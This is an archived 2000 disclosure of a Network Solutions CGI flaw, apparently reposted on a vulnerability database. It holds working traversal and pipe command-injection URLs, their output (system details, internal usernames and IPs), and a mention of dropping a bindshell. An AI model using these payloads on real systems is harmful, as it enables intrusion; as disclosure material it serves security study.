`networksolutions.com: www security hole. (may/9/2000)
Major security issue with networksolutions.com(easysteps.pl). I was in
#r00tabega, and someone relayed this(it was told to me Mr^Chaos found the
orginal read bug):
http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=maymun.com&FILE=/../../../../../../../etc/passwd
And I so with that initial bug found, I downloaded the perl script with the bug
itself. I noticed that a bigger problem existed:
---
open(CURR_FILE,$finalpath) or die "EASYSTEPS: Can't open file $finalpath\n";
my @LINES = <CURR_FILE>;
close(CURR_FILE);
---
$finalpath is for the most part supplied by the user. Knowning that open() can
be used to execute programs, I used the initial bug for this, by going to
the root dir and then accessing the file I wanted to execute followed by the
pipe:
opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/id|
return: uid=60001(nobody) gid=60001(nobody)
opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/uname%20-a|
return: SunOS www1 5.6 Generic_105181-15 sun4u sparc SUNW,Ultra-Enterprise
opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/who|
return: "
matthewh pts/1 Apr 17 11:32 (216.168.238.173)
rholgado pts/2 Apr 17 15:35 (216.168.235.124)
schauhan pts/3 May 4 16:05 (216.168.238.21)
pvirador pts/4 Apr 20 17:02 (216.168.238.21)
rholgado pts/5 Apr 18 13:39 (216.168.235.124)
rholgado pts/6 Apr 18 13:40 (216.168.235.124)
"
I decided NOT to be retarded. But, I could have wrote a bindshell to a tmp
directory and connected. While looking around the system I noticed some
public exploits that would have been able to get me root.
I just thought this was worth commenting on of a major corp, with
such a obvious bug. (I don't want to goto jail, I don't know about you.)
vade79[[email protected]] -> www.fakehalo.org
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation